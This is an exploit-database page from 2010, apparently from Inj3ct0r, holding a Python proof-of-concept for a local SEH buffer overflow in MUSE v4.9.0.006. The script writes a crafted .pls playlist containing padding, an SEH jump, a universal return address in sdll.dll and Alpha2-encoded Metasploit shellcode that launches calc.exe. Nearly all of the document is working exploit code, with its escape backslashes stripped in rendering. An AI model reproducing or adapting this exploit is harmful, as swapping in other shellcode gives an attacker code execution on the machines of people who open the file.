MUSE v4.9.0.006 (.pls) Local Universal Buffer Overflow [SEH]

Posted on 16 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>MUSE v4.9.0.006 (.pls) Local Universal Buffer Overflow [SEH]</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================================
MUSE v4.9.0.006 (.pls) Local Universal Buffer Overflow [SEH]
============================================================

# Exploit Title: MUSE v4.9.0.006 (.pls) Local Universal Buffer Overflow [SEH]
# Date: August 17, 2010
# Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
# Software Link: http://download.cnet.com/MUSE/3000-2140_4-42511.html
# Version: 4.9.0.006
# Tested on: Windows XP SP3 En
 
payload = &quot;x41&quot; * 1376
payload += &quot;xebx06x90x90&quot;
payload += &quot;xAAx0cx02x10&quot; # 10020CAA sdll.dll universal
payload += &quot;x90&quot; * 16
# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
payload += (&quot;xebx03x59xebx05xe8xf8xffxffxffx48x49x49x49x49x49&quot;
&quot;x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax68&quot;
&quot;x58x30x41x31x50x42x41x6bx41x41x78x32x41x42x41x32&quot;
&quot;x42x41x30x42x41x58x50x38x41x42x75x58x69x49x6cx49&quot;
&quot;x78x71x54x55x50x37x70x35x50x6cx4bx53x75x55x6cx6e&quot;
&quot;x6bx53x4cx74x45x62x58x56x61x4ax4fx4cx4bx30x4fx42&quot;
&quot;x38x6ex6bx73x6fx67x50x36x61x48x6bx70x49x6cx4bx66&quot;
&quot;x54x4ex6bx64x41x38x6ex74x71x49x50x7ax39x6ex4cx4e&quot;
&quot;x64x6bx70x52x54x44x47x4fx31x6bx7ax56x6dx46x61x5a&quot;
&quot;x62x5ax4bx78x74x67x4bx70x54x76x44x77x74x42x55x78&quot;
&quot;x65x6ex6bx53x6fx36x44x37x71x58x6bx30x66x4ex6bx44&quot;
&quot;x4cx62x6bx4ex6bx43x6fx57x6cx57x71x7ax4bx6cx4bx75&quot;
&quot;x4cx6ex6bx36x61x38x6bx6ex69x71x4cx44x64x75x54x79&quot;
&quot;x53x55x61x69x50x31x74x6ex6bx67x30x64x70x4fx75x59&quot;
&quot;x50x43x48x56x6cx6ex6bx41x50x76x6cx6cx4bx72x50x45&quot;
&quot;x4cx6cx6dx6ex6bx71x78x77x78x48x6bx66x69x4ex6bx6f&quot;
&quot;x70x4cx70x47x70x33x30x53x30x4cx4bx75x38x65x6cx43&quot;
&quot;x6fx76x51x78x76x75x30x50x56x4bx39x4bx48x6dx53x6f&quot;
&quot;x30x71x6bx76x30x35x38x78x70x4cx4ax75x54x63x6fx33&quot;
&quot;x58x4cx58x59x6ex6dx5ax34x4ex56x37x6bx4fx38x67x55&quot;
&quot;x33x45x31x30x6cx72x43x76x4ex53x55x53x48x70x65x37&quot;
&quot;x70x68&quot;)
payload += &quot;x90&quot; * 642
 
try:
    print &quot;[+] Creating exploit file..&quot;
    exploit = open('muse.pls','w');
    exploit.write(payload);
    exploit.close();
    print &quot;[+] Writing&quot;, len(payload), &quot;bytes to muse.pls&quot;
    print &quot;[+] Exploit file created!&quot;
except:
    print &quot;[-] Error: You do not have correct permissions..&quot;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-16]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20